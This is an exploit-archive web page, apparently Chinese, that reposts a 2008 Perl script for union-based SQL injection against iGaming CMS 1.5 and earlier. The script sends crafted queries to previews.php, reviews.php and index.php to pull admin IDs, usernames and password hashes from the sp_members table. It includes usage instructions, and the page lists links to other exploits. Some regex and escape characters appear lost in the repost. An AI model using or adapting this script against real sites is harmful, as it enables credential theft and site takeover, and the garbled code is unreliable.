手机
当前位置:查字典教程网 >网络安全 >Exploit >iGaming CMS
iGaming CMS
摘要:#!/usr/bin/perl#------------------------------------------------------...

#!/usr/bin/perl

# ----------------------------------------------------------

# iGaming <= 1.5 Multiple Remote SQL Injection Exploit

# Perl Exploit - Output: id:admin:password

# Discovered On: 23/09/2008

# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it

# Proud To Be Italian

# ----------------------------------------------------------

# Usage: perl exploit.pl http://localhost/iGaming

# ---------------------------------------------------------- use strict;

use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";

$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";

$host = shift @ARGV;

$http = new LWP::UserAgent or die $!;

$http->agent("Mozilla/4.5 [en] (Win95; U)");

$http->timeout(1);

if($host !~ /^http://(. ?)$/)

{

print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploitn";

print "[?] Usage: perl $0 http://[path]n";

exit;

}

else

{

$one = $http->get($host.'/previews.php?browse='.$exec);

$two = $http->get($host.'/reviews.php?browse='.$exec);

$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)

{

die "$1n" if $one->content =~ /%(. ?)%/;

die "$1n" if $two->content =~ /%(. ?)%/;

die "$1n" if $xxx->content =~ /%(. ?)%/;

}

else

{

die "[ ] Exploit Failed!n";

}

}

【iGaming CMS】相关文章:

Maian Uploader

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

AuraCMS

Maian Search

minb 0.1.0 Remote Code Execution Exploit

Acoustica Mixcraft

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

ESET Smart Security 3.0.667.0 Privilege Escalation PoC

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Linux Kernel

精品推荐
分类导航